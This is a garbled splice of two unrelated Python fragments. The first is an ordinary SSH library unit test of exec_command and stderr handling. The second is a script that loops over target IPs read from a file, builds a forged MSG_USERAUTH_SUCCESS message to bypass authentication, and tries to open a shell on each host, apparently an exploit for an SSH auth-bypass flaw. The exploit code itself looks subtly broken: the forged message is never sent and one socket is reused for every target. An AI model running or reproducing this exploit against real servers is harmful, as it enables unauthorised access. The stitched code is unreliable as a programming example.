self.assert_(self.ts.is_active()) def test_B_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command('no') self.assert_(False) except SSHException, x: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('', f.readline()) f = chan.makefile_stderr() self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline())
try: # First we're going to assume you can read. with open(sys.argv[1]) as ssh_targets: s = socket.socket() # Let's get rid of the '\n' that infests people who use .readlines() while forcing them to utilize .rstrip() ip_list = ssh_targets.read().splitlines() for ip in ip_list: try: print("Attempting to connect to {}:{}...".format(ip, port)) s.connect((ip, port)) msg = Message() trans = Transport(s) trans.start_client() print("Attempting to send MSG_USERAUTH_SUCCESS...") msg.add_byte(common.cMSG_USERAUTH_SUCCESS) cmd = trans.open_session() print("Attempting to load shell...") cmd.invoke_shell() except Exception as e: print(str(e)) except FileNotFoundError as e: print("File not found: {}".format(sys.argv[1])) except Exception as e: print("Possible PEKBAC error: {}".format(str(e)))